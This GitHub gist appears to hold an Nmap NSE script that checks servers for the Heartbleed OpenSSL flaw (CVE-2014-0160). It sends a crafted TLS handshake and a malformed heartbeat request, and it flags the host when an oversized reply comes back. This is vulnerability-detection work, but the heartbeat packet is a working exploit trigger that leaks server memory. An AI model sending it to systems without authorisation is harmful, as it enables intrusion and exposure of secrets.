Created
April 8, 2014 13:01
-
-
Save d33tah/10120564 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| local shortport = require "shortport" | |
| local nmap = require "nmap" | |
| local string = require "string" | |
| local bin = require "bin" | |
| local stdnse = require "stdnse" | |
| description = [[ | |
| Tests for CVE-2014-0160 "heartbleed" OpenSSL vulnerability. Based on the | |
| following script: | |
| http://s3.jspenguin.org/ssltest.py | |
| ]] | |
| author = "Jacek Wielemborek" | |
| license = "Same as Nmap--See http://nmap.org/book/man-legal.html" | |
| categories = {"intrusive", "vuln"} | |
| portrule = function(host, port) | |
| return shortport.ssl(host, port) | |
| end | |
| --- | |
| -- @usage | |
| -- nmap --script=ssl-heartbleed <target> -p 443 | |
| -- | |
| -- @output | |
| -- PORT STATE SERVICE | |
| -- 31337/tcp open Elite | |
| -- |_ssl-heartbleed: Vulnerable | |
| buf_pos = 0 | |
| buf = '' | |
| function recv_exact(s, n) | |
| if (buf:len() - buf_pos) >= n then | |
| local ret = buf:sub(buf_pos+1, buf_pos+n) | |
| buf_pos = buf_pos + n | |
| return ret | |
| else | |
| local status, data = s:receive_bytes(n - (buf:len() - buf_pos)) | |
| --TODO: detect errors | |
| buf = buf .. data | |
| return recv_exact(s, n) | |
| end | |
| end | |
| function recvmsg(s) | |
| local hdr = recv_exact(s, 5) | |
| local n, typ, ver, ln = bin.unpack('>CSS', hdr) | |
| local pay = recv_exact(s, ln) | |
| return typ, ver, ln, pay | |
| end | |
| action = function(host, port) | |
| local sock = nmap.new_socket() | |
| local status, err = sock:connect(host.ip, port.number) | |
| if not status then | |
| return | |
| end | |
| sock:send(string.char(0x16, 0x03, 0x02, 0x00, 0xdc, 0x01, 0x00, 0x00, | |
| 0xd8, 0x03, 0x02, 0x53, 0x43, 0x5b, 0x90, 0x9d, 0x9b, 0x72, 0x0b, | |
| 0xbc, 0x0c, 0xbc, 0x2b, 0x92, 0xa8, 0x48, 0x97, 0xcf, 0xbd, 0x39, | |
| 0x04, 0xcc, 0x16, 0x0a, 0x85, 0x03, 0x90, 0x9f, 0x77, 0x04, 0x33, | |
| 0xd4, 0xde, 0x00, 0x00, 0x66, 0xc0, 0x14, 0xc0, 0x0a, 0xc0, 0x22, | |
| 0xc0, 0x21, 0x00, 0x39, 0x00, 0x38, 0x00, 0x88, 0x00, 0x87, 0xc0, | |
| 0x0f, 0xc0, 0x05, 0x00, 0x35, 0x00, 0x84, 0xc0, 0x12, 0xc0, 0x08, | |
| 0xc0, 0x1c, 0xc0, 0x1b, 0x00, 0x16, 0x00, 0x13, 0xc0, 0x0d, 0xc0, | |
| 0x03, 0x00, 0x0a, 0xc0, 0x13, 0xc0, 0x09, 0xc0, 0x1f, 0xc0, 0x1e, | |
| 0x00, 0x33, 0x00, 0x32, 0x00, 0x9a, 0x00, 0x99, 0x00, 0x45, 0x00, | |
| 0x44, 0xc0, 0x0e, 0xc0, 0x04, 0x00, 0x2f, 0x00, 0x96, 0x00, 0x41, | |
| 0xc0, 0x11, 0xc0, 0x07, 0xc0, 0x0c, 0xc0, 0x02, 0x00, 0x05, 0x00, | |
| 0x04, 0x00, 0x15, 0x00, 0x12, 0x00, 0x09, 0x00, 0x14, 0x00, 0x11, | |
| 0x00, 0x08, 0x00, 0x06, 0x00, 0x03, 0x00, 0xff, 0x01, 0x00, 0x00, | |
| 0x49, 0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02, 0x00, 0x0a, | |
| 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x19, 0x00, | |
| 0x0b, 0x00, 0x0c, 0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16, | |
| 0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07, 0x00, 0x14, 0x00, | |
| 0x15, 0x00, 0x04, 0x00, 0x05, 0x00, 0x12, 0x00, 0x13, 0x00, 0x01, | |
| 0x00, 0x02, 0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11, 0x00, | |
| 0x23, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x01, 0x01)) | |
| while true do | |
| local typ, ver, len, payload = recvmsg(sock) | |
| if typ == 22 and len == 4 then | |
| break | |
| end | |
| end | |
| buf = '' | |
| buf_pos = 0 | |
| sock:send(string.char(0x18, 0x03, 0x02, 0x00, 0x03, 0x01, 0x40, 0x00)) | |
| while true do | |
| local typ, ver, len, payload = recvmsg(sock) | |
| stdnse.print_debug("Got it") | |
| if typ == 21 then | |
| break | |
| end | |
| if typ == 24 then | |
| if len > 3 then | |
| return "Vulnerable" | |
| end | |
| end | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment